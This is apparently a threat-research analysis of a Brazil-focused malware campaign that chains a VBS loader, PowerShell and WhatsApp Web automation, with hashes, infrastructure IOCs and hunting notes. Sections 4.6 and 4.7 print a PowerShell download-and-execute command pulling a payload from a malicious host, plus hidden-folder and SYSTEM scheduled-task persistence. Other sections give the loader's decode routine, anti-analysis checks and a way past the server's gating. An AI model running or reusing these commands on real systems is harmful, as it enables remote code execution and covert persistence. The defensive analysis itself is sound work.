Brazil-Focused Multi-Stage Campaign: VBS → PowerShell → WhatsApp Web Automation
Created: October 13, 2025
Introduction
WhatsApp is not secure, no matter what mass media will tell you, lie to you, or make you believe the ZIP file sent to you is benign and meant because you are loved. One click later—or a semblance of love later—and we’re staring at a 13 MB VBScript pirouetting through email (IMAP), fallback domains, and a gated PowerShell payload that ultimately drives WhatsApp Web automation at scale. This is not how you should travel.
This story of the macabre walks through every step—what each script does, which network calls fire when, what’s dropped where—where the wallet was left—so you can reproduce the detection logic and understand the operator’s playbook. More importantly, so that you are aware.
1) Case Timeline & Telemetry
processFilePath: C:\Windows\System32\wscript.exe
processCmd: "C:\Windows\System32\WScript.exe" "C:\Users\[REDACTED]\AppData\Local\Temp\e7ba5c50-2705-4d4e-b94e-8ff8cf7c95ea_Orcamento-202575878833.zip.5ea\-6ed49d55-ed3.vbs"
eventSubId: TELEMETRY_AMSI_EXECUTE
"TargetFilePath": C:\Users\[REDACTED]\Downloads\Orcamento-202575878833.zip,
"TargetFirstSeen": 2025-10-13T12:54:26.111Z,
"TargetLastSeen": 2025-10-13T12:54:26.111Z,
"Timezone": UTC-03:00,
"Url": hxxps://web.whatsapp[.]com/
On-Disk Sample & Hashes
Path: C:\Users\[REDACTED]\AppData\Local\Temp\...\-6ed49d55-ed3.vbs
Size: ~13 MB
Created: 2025-10-13 12:47:28
Modified: 2025-10-13 08:55:05
SHA1: 416768bbb9e2a882e0293a458a7b292888d3bc89
SHA256: aadb7abf4cd2fb62e3528bb4c57a51ac444ca51e27eac1d4c67f61462fe6c578
Additional sample:
SHA1: c1ed3d28af2953583d5d65b7faa54051d3552889
SHA256: 6048864be62ff1db5d0eb35d44e4fd6f84ae24b3e9ff1c1165b304451258c0be
MD5: 6bd1deb56e16cb21e22ca58d5752beb6
2) Infection Chain at a Glance
- User action: Opens a Portuguese-themed ZIP while web.whatsapp[.]com is active.
- Stage 0—VBS Loader: Massive
Chr()blobs decode to plaintext;ExecuteGlobalruns Stage-2 VBS in memory. - Stage 2—VBS Controller:
- Locale check (PT-BR/PT-PT) and anti-analysis.
- Configuration bootstrap via IMAP mailbox; else
/data.phpacross fallback domains; else Pastebin raw. - Builds & launches PowerShell to fetch the next stage; optional self-delete.
- PowerShell stage: Fetches gated payload from miportuarios[.]com/sisti/. Related tooling automates WhatsApp Web (Selenium/ChromeDriver/WPPConnect), uploads contacts, honors server pause/resume.
3) Stage 0 VBS (Loader / Decryptor)
Goal: Build plaintext script in memory and execute it.
- Technique: Thousands of
Chr(<digits>)concatenations create a pipe-delimited numeric stream. - Decode: Each token is int-cast and adjusted by multiple XOR-derived subtractions.
- Execute: Decoded buffer →
ExecuteGlobal→ Stage-2 controller.
varX = CInt(token)
varX = (varX - (202 Xor 10)) Mod 256
varX = (varX - (178 Xor 159)) Mod 256
varX = (varX - (38 Xor 250)) Mod 256
varX = (varX - (234 Xor 37 )) Mod 256
decoded_char = Chr(varX) ' → appended to in-memory script
4) Stage 2 VBS (Controller / Bootstrap)
Goal: Confirm locale, evade analysis, retrieve config, resolve next stage, persist.
4.1 Locale Gating
- Checks OSLanguage for
1046(pt-BR) /2070(pt-PT), - Registry fallback:
HKCU\Control Panel\International\sLanguagebegins withPT.
4.2 Anti-Analysis
Scans processes for tools such as x64dbg, Procmon, ProcessHacker; alters flow or exits if found.
4.3 Config Bootstrap — IMAP First
- Opens TLS IMAP to imap.terra.com.br:993.
- IMAP flow:
LOGIN → SELECT INBOX → SEARCH SUBJECT "data" → FETCH BODY[TEXT]. - Parses body for SERVER_URL, BACKUP_URL, maybe POWERSHELL_URL.
4.4 Config Bootstrap — Fallback Domains
If IMAP fails or yields nothing usable, iterate /data.php across:
lefthandsuperstructures[.]com
clhttradinglimited[.]com
mazdafinancialsevrices[.]com
ricardasphotography[.]com
jornalistaaurelianoborgesmidia[.]com
cursosgratiss[.]com[.]br
intelligentopennetworkingawards[.]com
vinhomeshungyentheempires[.]com
wbdiamonds[.]com
pastebin[.]com/raw/SmCz4cp8
4.5 Public IP Probe
HTTP GET to api.ipify[.]org to record external address.
4.6 Next-Stage Launch (PowerShell)
Forces TLS 1.2, downloads PS1, executes in memory:
powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
iex ((New-Object Net.WebClient).DownloadString('https://miportuarios[.]com/sisti/api.ps1'))"
4.7 Persistence & Cleanup
attrib.exe +h +s "C:\ProgramData\WindowsManager\"
schtasks.exe /create /tn "Windows Manager Services" /tr "wscript.exe 'C:\ProgramData\WindowsManager\WinManagers.vbs'" /sc onstart /ru SYSTEM /f
wscript.exe "C:\ProgramData\WindowsManager\WinManagers.vbs"
5) PowerShell Stage (Gated Payload & WhatsApp Automation)
Goal: Retrieve gated PS1 from miportuarios[.]com/sisti/ and operate via a PHP panel.
5.1 Gating Behavior
- Server may return tiny/empty responses unless the caller “feels right”.
- Lab capture often needs:
- Seed cookies via a fallback /data.php call,
Accept-Language: pt-BRand browser-like UA,Refererpointing to the seeded domain.
5.2 Panel Endpoints
miportuarios[.]com/sisti/api.php (queue/commands)
miportuarios[.]com/sisti/config.php (live config)
miportuarios[.]com/sisti/log.php (status/logging)
miportuarios[.]com/sisti/contacts.php (contact uploads)
5.3 WhatsApp Web Automation (Related Sample Behavior)
- Sets up Selenium/ChromeDriver + WPPConnect; navigates to hxxps://web.whatsapp[.]com/.
- Copies Chrome profile to C:\temp\ChromeWpp to reuse session/cookies.
- Lists contacts; sends messages/ZIP lure; respects
envio_ativopause/resume.
6) Network Flows & Infrastructure (IOCs)
6.1 IMAP Bootstrap
imap.terra.com.br:993 (TLS)
DNS chain example: imap.terra.com.br → terramail-imap.trafficmanager.net → vip-imap-az.eastus2.cloudapp.azure.com
6.2 Fallback Config (/data.php) & Pastebin
lefthandsuperstructures[.]com
clhttradinglimited[.]com
mazdafinancialsevrices[.]com
ricardasphotography[.]com
jornalistaaurelianoborgesmidia[.]com
cursosgratiss[.]com[.]br
intelligentopennetworkingawards[.]com
vinhomeshungyentheempires[.]com
wbdiamonds[.]com
pastebin[.]com/raw/SmCz4cp8
6.3 Panel / Operational
miportuarios[.]com/sisti/api.php
miportuarios[.]com/sisti/config.php
miportuarios[.]com/sisti/log.php
miportuarios[.]com/sisti/contacts.php
6.4 Other
api.ipify[.]org
cld[.]pt/dl/.../Orcamento...zip
web.whatsapp[.]com
7) Host Artifacts & Persistence
- Directories/Files:
- C:\ProgramData\WindowsManager\WinManagers.vbs
- C:\temp\chromedriver.exe
- C:\temp\ChromeWpp\ (copied Chrome profile)
- Process Chains:
wscript.exe → powershell.exewith-ep Bypass,DownloadString,IEX
- Tasks:
- Windows Manager Services (OnStart, SYSTEM) launching WinManagers.vbs
8) Detection & Hunting Notes
- Look for:
wscript.exe → powershell.exewith in-memory download/execute. - Files: C:\ProgramData\WindowsManager\WinManagers.vbs, C:\temp\chromedriver.exe, C:\temp\ChromeWpp\.
- Network: /data.php on listed domains; /sisti/* on miportuarios[.]com; IMAPS to imap.terra.com.br:993.
- Gated payload heuristic: HTTP
200with tiny bodies unlessReferer/Accept-Languagepresent.
Conclusion
This is a Brazil-focused, multi-stage campaign that uses a heavily-obfuscated VBS loader to fetch configuration via a hard-coded Terra IMAP mailbox and, failing that, a rotating set of /data.php domains (plus Pastebin). The loader spawns PowerShell to pull a gated payload from miportuarios[.]com/sisti/, which connects to a PHP panel (api.php, config.php, log.php, contacts.php). The operational goal is mass-messaging and contact harvesting via WhatsApp Web, driven by Selenium/ChromeDriver and the WPPConnect library. The tooling copies Chrome profile data, enabling session reuse and potential cookie/token exposure. As with most this bad one lives on CloudFlare.
Appendices (Downloads)
Appendix A: Stage-2 VBS Excerpts (TXT)
Appendix B: PowerShell Snippets (TXT)